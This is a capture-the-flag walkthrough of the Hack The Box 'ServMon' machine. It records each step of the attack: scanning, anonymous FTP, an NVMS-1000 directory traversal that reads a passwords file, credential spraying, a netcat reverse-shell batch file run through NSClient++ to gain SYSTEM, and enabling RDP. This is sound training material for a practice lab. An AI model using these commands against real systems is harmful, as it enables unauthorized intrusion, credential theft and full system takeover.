ServMon
Contents
Port scan
u505@naos:~/HTB/Machines/ServMon$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.184 [sudo] password for u505:
Starting masscan 1.0.5 at 2021-01-02 14:12:08 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 5666/tcp on 10.10.10.184 Discovered open port 6063/tcp on 10.10.10.184 Discovered open port 49667/tcp on 10.10.10.184 Discovered open port 49670/tcp on 10.10.10.184 Discovered open port 21/tcp on 10.10.10.184 Discovered open port 22/tcp on 10.10.10.184 Discovered open port 7680/tcp on 10.10.10.184 Discovered open port 49666/tcp on 10.10.10.184 Discovered open port 49665/tcp on 10.10.10.184 Discovered open port 49669/tcp on 10.10.10.184 Discovered open port 135/tcp on 10.10.10.184 Discovered open port 49668/tcp on 10.10.10.184 Discovered open port 139/tcp on 10.10.10.184 Discovered open port 5040/tcp on 10.10.10.184 Discovered open port 8443/tcp on 10.10.10.184 Discovered open port 49664/tcp on 10.10.10.184 Discovered open port 80/tcp on 10.10.10.184 Discovered open port 6699/tcp on 10.10.10.184 Discovered open port 445/tcp on 10.10.10.184
u505@naos:~/HTB/Machines/ServMon$ cat portsraw | cut -d ' ' -f 4 | cut -d '/' -f 1 | sort -n | while read port > do > printf $port"," > done 21,22,80,135,139,445,5040,5666,6063,6699,7680,8443,49664,49665,49666,49667,49668,49669,49670
u505@naos:~/HTB/Machines/ServMon$ nmap -p 21,22,80,135,139,445,5040,5666,6063,6699,7680,8443,49664,49665,49666,49667,49668,49669,49670 -sC -sV servmon Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-02 09:20 EST Nmap scan report for servmon (10.10.10.184) Host is up (0.046s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 11:05AM <DIR> Users | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA) | 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA) |_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519) 80/tcp open http | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 Not Found | Content-type: text/html | Content-Length: 0 | Connection: close | AuthInfo: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <title></title> | <script type="text/javascript"> | window.location.href = "Pages/login.htm"; | </script> | </head> | <body> | </body> |_ </html> |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 5666/tcp open tcpwrapped 6063/tcp open x11? 6699/tcp open napster? 7680/tcp open pando-pub? 8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | iday | Sat:Saturday | workers |_ jobs | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 |_ssl-date: TLS randomness does not represent time 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.91%I=7%D=1/2%Time=5FF08120%P=x86_64-pc-linux-gnu%r(GetRe SF:quest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nCont SF:ent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef SF:\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x SF:20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-tran SF:sitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml SF:\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<sc SF:ript\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20wi SF:ndow\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20< SF:/script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(HTTPOptions SF:,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-L SF:ength:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb\ SF:xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Tra SF:nsitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitio SF:nal\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\r SF:\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script\ SF:x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window\ SF:.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</scri SF:pt>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RTSPRequest,1B4, SF:"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-Length SF::\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb\xbf<! SF:DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transiti SF:onal//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\. SF:dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\r\n<he SF:ad>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script\x20ty SF:pe=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window\.loca SF:tion\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</script>\r SF:\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(FourOhFourRequest,65, SF:"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-type:\x20text/html\r\nCont SF:ent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.91%T=SSL%I=7%D=1/2%Time=5FF08127%P=x86_64-pc-linux-gnu SF:%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation: SF:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0Sat:Saturday\0\0\x12\ SF:x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x18\?\x12\x0f")%r(H SF:TTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocumen SF:t\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent SF:-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"HTTP SF:/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found") SF:%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocu SF:ment\x20not\x20found"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: 8m09s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-01-02T14:31:00 |_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 187.54 seconds
FTP enum
u505@naos:~/HTB/Machines/ServMon$ ftp servmon Connected to servmon. 220 Microsoft FTP Service Name (servmon:u505): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 11:05AM <DIR> Users 226 Transfer complete. ftp> cd Users 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 11:06AM <DIR> Nadine 01-18-20 11:08AM <DIR> Nathan 226 Transfer complete. ftp> cd Nadine 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 11:08AM 174 Confidential.txt 226 Transfer complete. ftp> get Confidential.txt local: Confidential.txt remote: Confidential.txt 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 174 bytes received in 0.04 secs (4.0506 kB/s) ftp> cd .. 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 11:06AM <DIR> Nadine 01-18-20 11:08AM <DIR> Nathan 226 Transfer complete. ftp> cd Nathan 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 11:10AM 186 Notes to do.txt 226 Transfer complete. ftp> get "Notes to do.txt" local: Notes to do.txt remote: Notes to do.txt 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 186 bytes received in 0.04 secs (4.3762 kB/s)
ftp> quit 221 Goodbye.
u505@naos:~/HTB/Machines/ServMon$ cat Notes\ to\ do.txt 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint
u505@naos:~/HTB/Machines/ServMon$ cat Confidential.txt Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Web enum Port 80
Dirsearch
u505@naos:~/HTB/Machines/ServMon$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,js,htm" -f -t 100 -u http://10.10.10.184
_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, js, htm | HTTP method: GET | Threads: 100 | Wordlist size: 23058
Error Log: /opt/utils/dirsearch/logs/errors-21-01-02_09-46-29.log
Target: http://10.10.10.184/
Output File: /opt/utils/dirsearch/reports/10.10.10.184/_21-01-02_09-46-29.txt
[09:46:29] Starting: [09:46:32] 200 - 118B - /_js [09:46:32] 200 - 118B - /_vti_txt [09:46:35] 200 - 118B - /ad_js [09:46:58] 200 - 1KB - /favicon.ico [09:46:58] 200 - 118B - /feedback_js [09:47:01] 200 - 118B - /gettxt [09:47:04] 200 - 118B - /htm [09:47:05] 200 - 340B - /Index.htm [09:47:05] 200 - 340B - /index.htm [09:47:08] 200 - 118B - /js [09:47:16] 200 - 118B - /mytag_js [09:47:17] 200 - 0B - /nul.js [09:47:17] 200 - 0B - /nul.htm [09:47:17] 200 - 0B - /nul.txt [09:47:40] 200 - 118B - /txt [09:47:46] 200 - 118B - /xajax_js
Task Completed
exploit NVMS
u505@naos:~/HTB/Machines/ServMon$ searchsploit nvms
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrar | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Ove | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/ServMon$ searchsploit -m 47774
Exploit: NVMS 1000 - Directory Traversal
URL: https://www.exploit-db.com/exploits/47774
Path: /usr/share/exploitdb/exploits/hardware/webapps/47774.txt
File Type: UTF-8 Unicode text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/ServMon/47774.txt
u505@naos:~/HTB/Machines/ServMon$ cat 47774.txt # Title: NVMS-1000 - Directory Traversal # Date: 2019-12-12 # Author: Numan Türle # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html
POC ---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close
Response ---------
; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
The application NVMS is vulnerable to LFI.
Web enum port 8443
Dirsearch
u505@naos:~/HTB/Machines/ServMon$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,html" -f -t 100 -u https://10.10.10.184:8443
_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, html | HTTP method: GET | Threads: 100 | Wordlist size: 18446
Error Log: /opt/utils/dirsearch/logs/errors-21-01-02_09-54-38.log
Target: https://10.10.10.184:8443/
Output File: /opt/utils/dirsearch/reports/10.10.10.184/_21-01-02_09-54-38.txt
[09:54:38] Starting: [09:54:44] 403 - 20B - /api/ [09:54:44] 403 - 20B - /api [09:54:46] 200 - 0B - /aux.html [09:54:54] 200 - 0B - /com2.html [09:54:55] 200 - 0B - /com3.html [09:54:55] 200 - 0B - /com1.html [09:54:55] 200 - 0B - /con.html [09:55:06] 403 - 20B - /exec/ [09:55:16] 200 - 5KB - /Index.html [09:55:16] 200 - 5KB - /index.html [09:55:23] 200 - 0B - /lpt1.html [09:55:23] 200 - 0B - /lpt2.html [09:55:30] 200 - 0B - /nul.html [09:55:38] 200 - 0B - /prn.html [09:55:41] 403 - 20B - /query/
Task Completed
User flag
LFI to read password file
Using the LFI, we can access Nathan's desktop where Nadine let the Password file.
u505@naos:~/HTB/Machines/ServMon$ telnet servmon 80 Trying 10.10.10.184... Connected to servmon. Escape character is '^]'. GET /../../../../../../../../../../../../users/nathan/desktop/passwords.txt HTTP/1.1 Host: servmon Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close
HTTP/1.1 200 OK Content-type: text/plain Content-Length: 156 Connection: close AuthInfo:
1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$Connection closed by foreign host.
find credentials
u505@naos:~/HTB/Machines/ServMon$ cat user.txt nadine nathan u505@naos:~/HTB/Machines/ServMon$ cat password.txt 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$
Try the list of users and passwords.
u505@naos:~/HTB/Machines/ServMon$ sudo crackmapexec smb 10.10.10.184/32 -u user.txt -p password.txt
SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [+] ServMon\nadine:L1k3B1gBut7s@W0rk
Check the available shares.
u505@naos:~/HTB/Machines/ServMon$ sudo crackmapexec smb 10.10.10.184/32 -u nadine -p 'L1k3B1gBut7s@W0rk' --shares SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False) SMB 10.10.10.184 445 SERVMON [+] ServMon\nadine:L1k3B1gBut7s@W0rk SMB 10.10.10.184 445 SERVMON [+] Enumerated shares SMB 10.10.10.184 445 SERVMON Share Permissions Remark SMB 10.10.10.184 445 SERVMON ----- ----------- ------ SMB 10.10.10.184 445 SERVMON ADMIN$ Remote Admin SMB 10.10.10.184 445 SERVMON C$ Default share SMB 10.10.10.184 445 SERVMON IPC$ READ Remote IPC
List of users.
u505@naos:~/HTB/Machines/ServMon$ sudo crackmapexec smb 10.10.10.184/32 -u nadine -p 'L1k3B1gBut7s@W0rk' --rid-brute SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False) SMB 10.10.10.184 445 SERVMON [+] ServMon\nadine:L1k3B1gBut7s@W0rk SMB 10.10.10.184 445 SERVMON [+] Brute forcing RIDs SMB 10.10.10.184 445 SERVMON 500: SERVMON\Administrator (SidTypeUser) SMB 10.10.10.184 445 SERVMON 501: SERVMON\Guest (SidTypeUser) SMB 10.10.10.184 445 SERVMON 503: SERVMON\DefaultAccount (SidTypeUser) SMB 10.10.10.184 445 SERVMON 504: SERVMON\WDAGUtilityAccount (SidTypeUser) SMB 10.10.10.184 445 SERVMON 513: SERVMON\None (SidTypeGroup) SMB 10.10.10.184 445 SERVMON 1002: SERVMON\Nadine (SidTypeUser) SMB 10.10.10.184 445 SERVMON 1003: SERVMON\sshd (SidTypeUser) SMB 10.10.10.184 445 SERVMON 1004: SERVMON\Nathan (SidTypeUser)
SSH into the box and user flag
u505@naos:~/HTB/Machines/ServMon$ ssh nadine@servmon nadine@servmon's password: Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt <USER_FLAG>
Escalation via NSClient++
Searchexploit
u505@naos:~/HTB/Machines/ServMon$ searchsploit NSCLIENT ---------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------- --------------------------------- NSClient++ 0.5.2.35 - Authenticated Remote Co | json/webapps/48360.txt NSClient++ 0.5.2.35 - Privilege Escalation | windows/local/46802.txt ---------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results
u505@naos:~/HTB/Machines/ServMon$ searchsploit -m 48360
Exploit: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
URL: https://www.exploit-db.com/exploits/48360
Path: /usr/share/exploitdb/exploits/json/webapps/48360.txt
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/ServMon/48360.txt
u505@naos:~/HTB/Machines/ServMon$ searchsploit -m 46802
Exploit: NSClient++ 0.5.2.35 - Privilege Escalation
URL: https://www.exploit-db.com/exploits/46802
Path: /usr/share/exploitdb/exploits/windows/local/46802.txt
File Type: ASCII text, with very long lines, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/ServMon/46802.txt
These 2 exploits explains how to abuse the application to execute a script with privileged user. Both need the admin password.
Access web console
The following command provides the password.
nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
But the access is denied.
The password is available in clear from the config file, but we see that only host 127.0.0.1 is allowed.
nadine@SERVMON c:\Users\Nadine>type "C:\Program Files\NSClient++\nsclient.ini" ´╗┐# If you want to fill this file with all available options run the following command: # nscp settings --generate --add-defaults --load-all # If you want to activate a module and bring in all its options use: # nscp settings --activate-module <MODULE NAME> --add-defaults # For details run: nscp settings --help
; in flight - TODO [/settings/default]
; Undocumented key password = ew2x6SsGTxjRwXOT
; Undocumented key allowed hosts = 127.0.0.1
...
We create a ssh tunnel to access the web as localhost.
u505@naos:~/HTB/Machines/ServMon$ ssh -L 8443:127.0.0.1:8443 nadine@servmon nadine@servmon's password: Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved.
Reverse shell
u505@naos:~/HTB/Machines/ServMon$ cp /opt/utils/nc.exe/nc64.exe ./ u505@naos:~/HTB/Machines/ServMon$ cat u505.bat @echo off date /T >> c:\temp\u505.log time /T >> c:\temp\u505.log c:\temp\nc64.exe 10.10.14.12 4444 -e cmd.exe
We create a batch file that calls home.
u505@naos:~/HTB/Machines/ServMon$ scp u505.bat nc64.exe nadine@10.10.10.184:/Temp/ nadine@10.10.10.184's password: u505.bat 100% 111 2.1KB/s 00:00 nc64.exe 100% 44KB 235.2KB/s 00:00
We raise a listener.
u505@naos:~/HTB/Machines/ServMon$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
We create a new command u505, with the command of our batch file.
Save the configuration.
Reload the daemon.
From the console call our external script.
u505@naos:~/HTB/Machines/ServMon$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.184. Ncat: Connection from 10.10.10.184:49951. Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved.
whoami whoami nt authority\system
Root flag
We can access the root flag from the reverse shell but this time, I will access it from remote desktop. Change the administrator password.
net user administrator u505 net user administrator u505 The command completed successfully.
SSH as administrator.
u505@naos:~/HTB/Machines/ServMon$ ssh administrator@servmon administrator@servmon's password: Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved.
administrator@SERVMON C:\Users\Administrator\Desktop>whoami servmon\administrator
Activate Remote desktop and allow firewall access.
administrator@SERVMON C:\Users\Administrator\Desktop>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f The operation completed successfully.
administrator@SERVMON C:\Users\Administrator\Desktop>netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Updated 3 rule(s). Ok.
Remote desktop into the machine
u505@naos:~$ xfreerdp servmon [17:26:56:562] [17624:17624] [WARN][com.freerdp.client.common.cmdline] - Using deprecated command-line interface! [17:26:56:562] [17624:17624] [WARN][com.freerdp.client.common.compatibility] - servmon -> /v:servmon [17:26:56:562] [17624:17624] [WARN][com.freerdp.client.common.compatibility] - [17:26:56:562] [17624:17625] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state [17:26:56:562] [17624:17625] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr [17:26:56:562] [17624:17625] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd [17:26:56:562] [17624:17625] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr [17:26:56:873] [17624:17625] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized [17:26:56:880] [17624:17625] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state [17:26:56:880] [17624:17625] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state [17:26:57:069] [17624:17625] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0 [17:26:57:069] [17624:17625] [WARN][com.freerdp.crypto] - CN = ServMon Username: administrator Domain: Password: ...
References
- https://docs.nsclient.org/howto/external_scripts/
- https://docs.nsclient.org/howto/run_commands/
- HOW TO ENABLE REMOTE DESKTOP USING COMMAND PROMPT ON WINDOWS 10
Daniel Simao 18:02, 2 January 2021 (EST)
